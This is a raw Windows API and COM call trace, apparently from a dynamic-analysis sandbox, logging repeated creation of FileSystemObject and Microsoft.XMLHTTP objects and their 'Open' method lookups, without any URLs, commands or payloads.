	[0347.949] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0347.949] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0347.949] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0347.949] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0347.949] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0347.949] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0348.660] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0348.660] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0348.660] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0348.661] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0348.661] SysStringLen (param_1=0x0) returned 0x0
	[0348.661] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0348.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0348.661] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0348.662] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0348.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0348.662] ??2@YAPEAX_K@Z () returned 0x62f330
	[0348.662] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f330) 
	[0348.662] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0348.662] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0348.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0348.662] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0348.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0348.662] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0348.665] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0348.665] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0348.665] SysStringLen (param_1=0x0) returned 0x0
	[0348.665] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0348.665] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0348.665] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0348.665] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0348.665] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0348.665] ??2@YAPEAX_K@Z () returned 0x62f310
	[0348.665] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0348.665] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0348.665] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0348.665] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0348.665] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0348.666] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0348.666] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0348.666] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0348.666] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0348.666] SysStringLen (param_1=0x0) returned 0x0
	[0348.666] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0348.666] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0348.666] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7850) returned 0x0
	[0348.666] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0348.666] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7850, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0348.666] ??2@YAPEAX_K@Z () returned 0x62f330
	[0348.666] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f330) 
	[0348.666] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0348.666] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0348.666] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7850, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7850) returned 0x0
	[0348.667] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7850) returned 0x3
	[0348.667] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7850, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0348.667] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7850, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0348.667] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7850, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0348.667] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0348.667] SysStringLen (param_1=0x0) returned 0x0
	[0348.667] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0348.667] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0348.667] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0348.667] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0348.667] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0348.667] ??2@YAPEAX_K@Z () returned 0x62f310
	[0348.667] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0348.667] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0348.667] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0348.667] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0348.667] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0348.668] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0348.668] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0348.668] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0348.668] longjmp () 
	[0348.668] longjmp () 
	[0348.668] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0348.668] SysStringLen (param_1=0x0) returned 0x0
	[0348.668] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0348.668] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0348.668] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0348.668] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0348.668] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0348.668] ??2@YAPEAX_K@Z () returned 0x62f330
	[0348.668] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0348.668] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0348.669] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0348.669] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0348.669] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0348.669] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0348.669] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0348.669] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0348.669] longjmp () 
	[0348.669] longjmp () 
	[0348.669] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0348.669] SysStringLen (param_1=0x0) returned 0x0
	[0348.669] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0348.669] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0348.669] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0348.670] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0348.670] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0348.670] ??2@YAPEAX_K@Z () returned 0x62f310
	[0348.670] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f310) 
	[0348.670] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0348.670] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
